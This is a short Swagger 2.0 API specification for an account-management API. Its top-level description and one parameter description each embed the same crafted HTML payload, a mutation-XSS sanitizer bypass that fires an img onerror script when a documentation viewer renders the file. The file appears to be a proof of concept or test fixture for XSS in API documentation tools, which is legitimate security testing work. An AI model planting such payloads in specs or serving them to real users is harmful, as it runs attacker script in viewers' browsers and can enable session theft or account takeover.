swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <div*200><form><input name="parentNode"><div*200><form></form><form><input name="parentNode"><div*105><table><caption><svg><desc><table><caption></caption></table></desc><style><a title="</svg></style><img src onerror=alert(1)>"></a></style></svg></caption></table>

  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
  '/accounts/groupid/{id}':
    delete:
      parameters:
        - description: |
            <div*200><form><input name="parentNode"><div*200><form></form><form><input name="parentNode"><div*105><table><caption><svg><desc><table><caption></caption></table></desc><style><a title="</svg></style><img src onerror=alert(1)>"></a></style></svg></caption></table>
